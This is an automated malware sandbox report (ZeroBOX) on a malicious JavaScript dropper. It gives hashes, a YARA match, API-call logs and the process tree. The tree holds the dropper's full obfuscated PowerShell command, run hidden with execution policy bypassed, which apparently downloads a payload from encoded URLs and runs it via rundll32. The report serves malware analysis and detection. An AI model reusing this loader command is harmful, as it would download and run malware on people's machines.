Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 12, 2023, 9:26 a.m.	May 12, 2023, 9:29 a.m.

Size	166.8KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`10cb0a754ebcb9f526f7124105d1c1fc`
SHA256	`3491104614d4674c3aaecac8925b7a73c4ca598a9d0f18a3866842aa036c3a74`
CRC32	`0A9BE67C`
ssdeep	`1536:Ov5Z3lfuliPQFRqYAKsPek8dLT4L5IS4HIDpJqccswS848k0vW1XQtts8:Ov5FFufko4dV4oDpJqc1wcFgttd`
Yara	Generic_Malware_Zero - Generic Malware

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Cnsx.js
2032
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Cnsx.js" HydrocinnamicCanalised Batboy broachingAppetibleness
  1368
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABtAG8AbwByAGUAcwBzAFQAYQByAHQAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgB3AEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAD0ASQBoAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGIAdwBCAHQAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAaABBAEcAdwBBAEwAZwBCAHEAQQBIAEEAQQBJAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATgBnAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABBAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMwA7ACQAdQBwAHIAYQBpAHMAZQBkAEYAaQBsAGUAcwBhAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBIAGsAQQBjAEEAQgB1AEEARwA4AEEAZABBAEIAcABBAEgAbwBBAFoAUQBBAHUAQQBHAFkAQQBkAFEAQgAwAEEARwBJAEEAYgB3AEIAcwBBAEEAPQA9AFIASABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUgBBAEgAVQBBAGEAUQBCAHUAQQBHAEUAQQBjAGcAQgBwAEEARwBFAEEAYgBnAEIASgBBAEcANABBAFoAZwBCAGgAQQBHADQAQQBaAHcAQgBzAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBHADAAQQBiAGcAQQA9ACIAOwAkAFMAZQBtAGkAaABhAHIAZABDAGEAcABzAHUAbABvAHAAdQBwAGkAbABsAGEAcgB5ACAAPQAgADUANgA7ACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBYAEEASABjAEEAZQBnAEIAegBBAEgATQBBAFUAQQBCAHEAQQBHAFkAQQBkAGcAQgA2AEEARQBZAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAE8AQQBCADYAQQBIAEkAQQBXAEEAQQA0AEEAQQA9AD0AUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADgAQQBhAEEAQQAzAEEARABFAEEATAB3AEIASQBBAEYAUQBBAGMAQQBBADMAQQBFAHMAQQBlAFEAQgBhAEEARABRAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAawBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABJAEEATgBBAEEANABBAEMANABBAE0AUQBBADIAQQBEAE0AQQBMAHcAQgBZAEEARwA0AEEAVQBRAEIAawBBAEQASQBBAFkAZwBCAE0AQQBDADgAQQBaAHcAQgBrAEEARwBjAEEAVgBBAEIAbgBBAEcATQBBAFMAdwBCAG4AQQBHADAAQQBOAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBGAFkAQQBiAGcAQgB6AEEARABNAEEAUwBBAEIAbQBBAEcAYwBBAGMAQQBCAG8AQQBHAEkAQQBjAEEAQQB3AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUAByAGUAZgBpAGcAdQByAGUAcwBVAG4AdwByAGEAcABwAGUAcgAgAGkAbgAgACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAAtAHMAcABsAGkAdAAgACIAUABaACIAKQAgAHsAJABHAHUAcwBoAGkAbgBnACAAPQAgADUANAA2ADsAJABVAG4AZQB4AHQAcgBhAGMAdABlAGQARABlAGwAaQBnAGgAdAAgAD0AIAAiAEUAdABoAHkAbABhAHQAaQBvAG4AIgA7AHQAcgB5ACAAewAkAGkAbgBmAGUAcgB0AGkAbABlAEEAZQBzAGMAdQBsAGEAYwBlAG8AdQBzACAAPQAgACIAZwBsAG8AcwBzAGEAcgBpAHoAZQAiADsAJABOAG8AbgBlAHgAcABvAHMAdQByAGUAVAByAGEAbgBzAG0AaQB0AHQAYQBiAGkAbABpAHQAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAHIAZQBmAGkAZwB1AHIAZQBzAFUAbgB3AHIAYQBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAE4AbwBuAGUAeABwAG8AcwB1AHIAZQBUAHIAYQBuAHMAbQBpAHQAdABhAGIAaQBsAGkAdAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHQAdABlAHIAcwB3AGUAZQB0AHMATQBpAGwAawBsAGkAawBlAC4AbABvAHYAYQBiAGwAeQBVAG4AcwBhAHcAZQBkADsAJABjAG8AbQBtAGUAbQBvAHIAYQB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBzAHkAbgBhAHAAdABpAGMAYQBsAGwAeQAgAD0AIAAyADMAOAA7ACQAcgBlAHMAaQBsAGkAdQBtACAAPQAgADkAMgA3ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGIAaQB0AHQAZQByAHMAdwBlAGUAdABzAE0AaQBsAGsAbABpAGsAZQAuAGwAbwB2AGEAYgBsAHkAVQBuAHMAYQB3AGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANQA0ADMANgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABRAEEAZABBAEIAbABBAEgASQBBAGMAdwBCADMAQQBHAFUAQQBaAFEAQgAwAEEASABNAEEAVABRAEIAcABBAEcAdwBBAGEAdwBCAHMAQQBHAGsAQQBhAHcAQgBsAEEAQwA0AEEAYgBBAEIAdgBBAEgAWQBBAFkAUQBCAGkAQQBHAHcAQQBlAFEAQgBWAEEARwA0AEEAYwB3AEIAaABBAEgAYwBBAFoAUQBCAGsAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEcAaQBuAGcAZQByAG4AZQBzAHMAUgBlAHQAcgBvAGMAZQBjAGEAbAAgAD0AIAAiAEQAZQByAGUAbABpAG4AcQB1AGkAcwBoAEcAYQBtAGUAbABvAHQAdABlACIAOwAkAFMAcABvAG8AZgBzACAAPQAgACIAbgB1AG0AaQBuAGkAcwBtACIAOwBiAHIAZQBhAGsAOwB9AFIAZQBhAGMAdABEAE8ATQA7AH0AIABjAGEAdABjAGgAIAB7ACQAUwBhAGwAdAB1AHMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBMAEEARwBVAEEAYgBRAEIAdwBBAEcAdwBBAFoAUQBCAEQAQQBIAEkAQQBiAHcAQgB6AEEASABNAEEAWQBnAEIAdgBBAEcANABBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBoAEEASABNAEEAYQBRAEIAdQBBAEcAOABBACIAOwAkAGEAbgB0AGkAYwBsAGkAbQBhAGMAdABpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQAwAEEAQwA0AEEATgBBAEEAeQBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABBAEEAIgA7ACQAUABhAGwAbQBpAHAAZQBkAFQAbwBjAG8AbABvAGcAaQBjAGEAbAAgAD0AIAA2ADIAOwB9AH0AJABiAGUAcwBjAG8AdQByAGcAZQAgAD0AIAA5ADUAOQA7ACQAbQBhAGMAZQBkAG8AaQBuAGUAUgBhAHQAdABsAGkAbgBnACAAPQAgACIAcABlAGwAbwBwAGkAZABTAHEAdQBhAHQAdABvAGMAcgBhAGMAeQAiADsA"
    2416

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 12, 2023, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 12, 2023, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 12, 2023, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 12, 2023, 9:26 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 12, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 12, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 12, 2023, 9:26 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5958 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5558 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5718 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5b58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:26 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5a18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c5118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 12, 2023, 9:26 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 135 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 1368 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x742d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02050000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02060000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02061000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02062000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
